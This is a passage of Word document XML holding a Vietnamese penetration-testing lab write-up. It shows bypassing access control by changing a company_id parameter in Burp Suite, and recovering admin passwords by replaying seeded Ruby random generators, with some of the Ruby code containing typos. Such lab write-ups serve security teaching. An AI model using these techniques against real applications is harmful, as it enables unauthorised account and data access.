        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> nhận thấy user có thông tin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D31DC9"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b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>user%5Busername%5D=</w:t>
      </w:r>
      <w:r w:rsidRPr="00E44BF6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. Thông minh một chút ta sẽ thấy được thông tin </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E44BF6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ID  của</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E44BF6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> company2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2A8E26"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b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>user%5Bcompany_id%5D=2</w:t>
      </w:r>
      <w:r w:rsidRPr="00E44BF6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9C1162" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="00E44BF6" w:rsidRDefault="004653AE" w:rsidP="00E44BF6">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44BF6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Tiến hành chèn vào burpsuite ta đươc:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0453C4AE" w14:textId="18D26B73"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2C56CBBA">
          <v:shape id="Hình ảnh 143" o:spid="_x0000_i1173" type="#_x0000_t75" style="width:468pt;height:221.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId164" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAD0627" w14:textId="2C86EBE6"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sz w:val="4"/>
          <w:szCs w:val="4"/>
        </w:rPr>
        <w:pict w14:anchorId="33144AD0">
          <v:shape id="Hình ảnh 144" o:spid="_x0000_i1174" type="#_x0000_t75" style="width:468pt;height:263.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId165" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D1CFD3"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Kết quả là ta đã truy cập thành công vào Company 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701E9A55" w14:textId="65A6C7E7"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066B83AA">
          <v:shape id="Hình ảnh 145" o:spid="_x0000_i1175" type="#_x0000_t75" style="width:468pt;height:263.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId166" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6113900F" w14:textId="77777777" w:rsidR="004653AE" w:rsidRDefault="004653AE" w:rsidP="004653AE">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="00870606">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.RANDOMNESS</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00870606">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> ISSUES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468A7FEB"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Theo cách nói thông thường, tính ngẫu nhiên là sự thiếu khuôn mẫu hoặc khả năng dự đoán rõ ràng trong các sự kiện. Một chuỗi sự kiện, biểu tượng hoặc bước ngẫu nhiên thường không có thứ tự và không tuân theo một khuôn mẫu hoặc sự kết hợp dễ hiểu. Các sự kiện ngẫu nhiên riêng lẻ theo định nghĩa là không thể đoán trước được, nhưng vì chúng thường tuân theo phân phối xác suất, tần suất của các kết quả khác nhau trong nhiều sự kiện (hoặc "thử nghiệm") có thể dự đoán được. Ví dụ: khi ném hai viên xúc xắc, kết quả của bất kỳ lần tung cụ thể nào là không thể đoán trước, nhưng tổng của 7 sẽ xảy ra thường xuyên gấp đôi so với 4. Theo quan điểm này, tính ngẫu nhiên là thước đo độ không chắc chắn của một kết quả, chứ không phải là sự lộn xộn của nó, và áp dụng cho các khái niệm về cơ hội, xác suất và entropy thông tin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5A267F"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Tùy thuộc vào cách nhà phát triển tạo số hoặc chuỗi ngẫu nhiên, các giá trị được tạo có thể nhiều hơn và ít ngẫu nhiên hơn. Sai lầm lớn nhất, và lớn nhất là tạo ngẫu nhiên theo cách thủ công bằng cách sử dụng hằng số hoặc thời gian hiện tại; điều này sẽ cho phép kẻ tấn công có thể dự đoán những giá trị đã và sẽ được tạo ra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F83C4F4"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Example 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D27B747"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Ví dụ đầu tiên này chỉ ở đây để cho thấy ngẫu nhiên không thực sự là ngẫu nhiên. Vấn đề đến từ việc sử dụng một trình tạo ngẫu nhiên được gieo hạt. Nhà phát triển đã sử dụng giá trị 0 để khởi tạo trình tạo ngẫu nhiên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AF1BB2"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Nếu bạn chỉ phát lại tập lệnh, bạn sẽ có thể tìm thấy mật khẩu được tạo cho quản trị viên quản trị.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C67414"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 xml:space="preserve">Trước hết tôi sẽ hướng dẫn bạn cài đặt </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD7D8F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pentestbox,một</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD7D8F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> công cụ đắt lực như Kali linux phục vụ cho viếc kiểm thử xâm nhập hay attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5FD2D8" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="00CD7D8F" w:rsidRDefault="004653AE" w:rsidP="00CD7D8F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD7D8F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Bước 1: Ta truy cập vào trang pentestbox.org để download linux với phiên bản không có Metasploit.Lưu ý hãy tắt Fire Wall để có thể cài đặt nó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A288F6B" w14:textId="32A48DBB" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="004653AE">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="7A01D064">
          <v:shape id="Hình ảnh 146" o:spid="_x0000_i1176" type="#_x0000_t75" style="width:467.25pt;height:270.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId167" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6112EBBD" w14:textId="1A3D5A3E" w:rsidR="004653AE" w:rsidRPr="007F6C49" w:rsidRDefault="004653AE" w:rsidP="007F6C49">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F6C49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Bước 2.</w:t>
      </w:r>
      <w:r w:rsidR="00D915CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007F6C49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sau khi tải về thành công chỉ cần click vào biểu tượng pentestbox.exe là có thể khởi chạy và sử dụng nó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEA92C5" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="007F6C49" w:rsidRDefault="004653AE" w:rsidP="007F6C49">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F6C49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Tiếp tục mở ứng dụng pentestbox và gõ lệnh irb để có thể chạy tiến trình của câu lệnh Ruby.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0D52A1" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="007F6C49" w:rsidRDefault="004653AE" w:rsidP="007F6C49">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F6C49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sau đó tôi chạy câu lệnh Ruby lần lượt là:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6927B3C4" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="00D915CD" w:rsidRDefault="004653AE" w:rsidP="007F6C49">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D915CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Irb(main</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D915CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):001:0</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D915CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; s =Ramdom.new(0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332858C5" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="00D915CD" w:rsidRDefault="004653AE" w:rsidP="007F6C49">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D915CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Irb(main</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D915CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):002:0</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D915CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt; pass =6.times.map { (‘a’..’z’).to_a[s.rand((‘a’..’z’).to_a.size)]}.john</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE24CFE" w14:textId="0A5A4668" w:rsidR="004653AE" w:rsidRPr="007F6C49" w:rsidRDefault="004653AE" w:rsidP="007F6C49">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F6C49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Với 2 câu lệnh Ruby vừa sử dụng trên ta thu được mật khẩu:</w:t>
      </w:r>
      <w:r w:rsidR="007F6C49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007F6C49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mpvadd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB0746E" w14:textId="2F5F1428"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203F16EC">
          <v:shape id="Hình ảnh 147" o:spid="_x0000_i1177" type="#_x0000_t75" style="width:468pt;height:252pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId168" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="556F76BA"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 xml:space="preserve">Sử dụng mật khẩu vừa lấy được tiên hành đăng </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>nhập.Ta</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> được</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B5BC03" w14:textId="7181C60C" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="00C1434E">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="36E2E4C4">
          <v:shape id="Hình ảnh 148" o:spid="_x0000_i1178" type="#_x0000_t75" style="width:468pt;height:263.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId169" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FA6C80" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="00C1434E" w:rsidRDefault="004653AE" w:rsidP="00C1434E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C1434E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Example 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722120D3" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="00C1434E" w:rsidRDefault="004653AE" w:rsidP="00C1434E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C1434E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Ở đây SEED là dấu thời gian hiện tại, để lấy mật khẩu, chỉ cần tạo một tập lệnh, giống như dưới đây, bằng ruby ​​chạy ngược các tem thời gian cho đến khi nó tìm thấy mật khẩu cho hacker, sau đó chỉ cần lưu thời gian đó. đóng dấu và sử dụng nó để tìm mật khẩu cho quản trị viên (chạy lại mã trong trang nhưng với dấu thời gian chính xác).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF52394" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="00C1434E" w:rsidRDefault="004653AE" w:rsidP="00C1434E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C1434E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Tôi mở ứng dụng </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C1434E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PentestBox,gọi</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C1434E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> lệnh Ruby và tiến hành gõ các câu lệnh sau.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0662D862" w14:textId="292CE298" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="004653AE">
      <w:pPr>
        <w:pStyle w:val="simple-translate-result"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="55012D1F">
          <v:shape id="Hình ảnh 149" o:spid="_x0000_i1179" type="#_x0000_t75" style="width:468pt;height:201.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId170" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1913E592" w14:textId="2176103B" w:rsidR="004653AE" w:rsidRPr="007D4720" w:rsidRDefault="004653AE" w:rsidP="007D4720">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D4720">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Cuối cùng ta được mật khẩu là:</w:t>
      </w:r>
      <w:r w:rsidR="007D4720" w:rsidRPr="007D4720">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007D4720">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xvvnnq.</w:t>
      </w:r>
      <w:r w:rsidR="007D4720" w:rsidRPr="007D4720">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007D4720">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Tiến hành đăng nhập ta được kết quả là:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5ACDD5" w14:textId="1C845195" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="004653AE">
      <w:pPr>
        <w:pStyle w:val="simple-translate-result"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="30B4A0A9">
          <v:shape id="Hình ảnh 70" o:spid="_x0000_i1180" type="#_x0000_t75" style="width:468pt;height:253.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId171" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55973C45" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="007D4720" w:rsidRDefault="004653AE" w:rsidP="007D4720">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D4720">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Example 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EFFF61" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="007D4720" w:rsidRDefault="004653AE" w:rsidP="007D4720">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D4720">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Ở ví dụ 3 tương tự ví dụ 1 chỉ khác là số kí tự mật khẩu dài </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007D4720">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hơn.Sao</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007D4720">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> khi sử dụng rib ta được mật khẩu :</w:t>
      </w:r>
      <w:r w:rsidRPr="007D4720">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pvaddhjtvs</w:t>
      </w:r>
      <w:r w:rsidRPr="007D4720">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> tiến hành đăng nhập ta được như hình dưới.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0324FDB0" w14:textId="70BBEE82"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BADFCBA">
          <v:shape id="Hình ảnh 150" o:spid="_x0000_i1181" type="#_x0000_t75" style="width:430.5pt;height:242.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId172" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D250D6C" w14:textId="508207D3" w:rsidR="004653AE" w:rsidRPr="009B2452" w:rsidRDefault="004653AE" w:rsidP="009B2452">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B2452">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Example 4</w:t>
      </w:r>
      <w:r w:rsidR="003C307E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5180C2D3" w14:textId="40BF1A88" w:rsidR="004653AE" w:rsidRPr="009B2452" w:rsidRDefault="004653AE" w:rsidP="009B2452">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B2452">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong ví dụ này, tôi không biết trình tạo số ngẫu nhiên đã được sử dụng bao nhiêu lần trước đó, nhưng chúng tôi vẫn có thể bắt buộc đặt mật khẩu cho đến khi chúng tôi tìm thấy cùng một mật khẩu trong tài khoản hacker và sau đó chạy mã quản trị với giá trị chính </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009B2452">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xác .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="60948FFE" w14:textId="6515E0C5" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="00AC658F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
